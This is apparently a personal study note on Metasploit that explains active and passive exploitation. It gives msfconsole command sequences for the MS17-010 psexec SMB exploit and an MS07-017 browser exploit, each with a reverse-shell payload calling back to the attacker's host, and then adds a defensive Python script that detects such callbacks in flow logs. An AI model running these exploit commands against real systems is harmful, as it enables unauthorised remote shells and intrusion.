Learn Metasploit again
The Metasploit I studied before was forgotten because I wrote no notes. This time I am keeping complete notes of what I learn.
1. Active Exploit
- The target runs some server with an open port. The attacker actively sends exploit code to that port (for example, a payload that executes a reverse shell) and obtains a shell on the target.
- "Active" means the attacker is the side that initiates the exploit.
Demo command (comments translated from the original notes; the user name and password are placeholders to fill in):

    use exploit/windows/smb/ms17_010_psexec
    set RHOST 192.168.1.100               # target IP
    set PAYLOAD windows/shell/reverse_tcp # a reverse shell
    set LHOST 192.168.1.1                 # the IP the shell connects back to
    set LPORT 4444
    set SMBUSER <system username>
    set SMBPASS <system password>
    exploit
2. Passive Exploit
- The target machine itself exposes no vulnerable service; the vulnerability is in client software. The client connects to a service on a remote server, that server hosts the exploit code, and the vulnerable client program is exploited when it processes what the server returns.

Demo command (comments translated from the original notes; the original wrote `set PORT 4444`, corrected here to the module's `LPORT` option):

    use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
    set SRVHOST 192.168.0.109             # my own IP, where the web page is served
    set PAYLOAD windows/shell/reverse_tcp # the target visits my web page and a reverse shell connects back
    set LHOST 192.168.1.1                 # the IP the shell connects back to
    set LPORT 4444
    exploit
Once launched, the target accesses the vulnerable page, the vulnerability is triggered, and a shell connection comes back.
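From the defender's side, the two patterns above leave opposite footprints in connection logs: in the active case an external host contacts an internal service port (SMB here) and the server then opens an outbound connection to an external host; in the passive case an internal client fetches a web page and the client then opens an outbound connection on a non-web port. The following is an added example, not code from the original notes: it parses constructed firewall flow records (`timestamp src dst dport`, a format assumed here) and correlates a trigger flow with a callback from the same internal host within a short window. The internal range, watched ports, time window and all addresses are assumptions for the example.

```python
"""Correlate flow records to flag the two reverse-connection shapes
(inbound-service-then-callback, client-fetch-then-callback).
Added example; log format, ranges and addresses are constructed."""
import ipaddress
from dataclasses import dataclass

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/24")  # assumed internal range
SERVICE_PORTS = {139, 445}                           # inbound services watched (SMB)
WEB_PORTS = {80, 443, 8080}                          # ordinary client-side fetches
WINDOW = 30                                          # seconds between trigger and callback


@dataclass(frozen=True)
class Flow:
    ts: int
    src: str
    dst: str
    dport: int


def parse_flows(lines):
    """Parse 'ts src dst dport' records into Flow objects, skipping malformed lines."""
    flows = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        try:
            flows.append(Flow(int(parts[0]), parts[1], parts[2], int(parts[3])))
        except ValueError:
            continue
    return sorted(flows, key=lambda f: f.ts)


def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL_NET


def find_callback_patterns(flows):
    """Return (pattern, victim, callback_dst, callback_port) tuples.

    A trigger is either an external host reaching a watched service port on an
    internal host (active pattern) or an internal client fetching from an
    external web port (passive pattern). A finding is raised when the same
    internal host then connects out to an external host on a non-service,
    non-web port within WINDOW seconds."""
    findings = []
    for i, trig in enumerate(flows):
        if is_internal(trig.dst) and not is_internal(trig.src) and trig.dport in SERVICE_PORTS:
            pattern, victim = "active: inbound service then callback", trig.dst
        elif is_internal(trig.src) and not is_internal(trig.dst) and trig.dport in WEB_PORTS:
            pattern, victim = "passive: client fetch then callback", trig.src
        else:
            continue
        for cb in flows[i + 1:]:
            if cb.ts - trig.ts > WINDOW:
                break  # records are sorted, nothing later is inside the window
            if (cb.src == victim and not is_internal(cb.dst)
                    and cb.dport not in WEB_PORTS and cb.dport not in SERVICE_PORTS):
                findings.append((pattern, victim, cb.dst, cb.dport))
                break
    return findings


# Constructed sample records (TEST-NET addresses stand in for external hosts).
SAMPLE_LOG = [
    "1000 203.0.113.7 10.0.0.100 445",   # external host reaches the SMB service
    "1003 10.0.0.100 203.0.113.7 4444",  # the server then connects out: active shape
    "2000 10.0.0.50 203.0.113.9 8080",   # client fetches a page from an external server
    "2004 10.0.0.50 203.0.113.7 4444",   # the client then connects out: passive shape
    "3000 10.0.0.60 203.0.113.9 443",    # ordinary browsing with no follow-up
    "3001 10.0.0.60 203.0.113.9 443",
    "not a flow record",                 # malformed line, skipped by the parser
]

if __name__ == "__main__":
    for finding in find_callback_patterns(parse_flows(SAMPLE_LOG)):
        print(finding)
```

The correlation key is the internal host, not the external address, because the page's passive example serves the page from one address (SRVHOST) and receives the shell on another (LHOST); keying on the external side would miss exactly that case. Plain browsing that is followed only by more web fetches produces no finding.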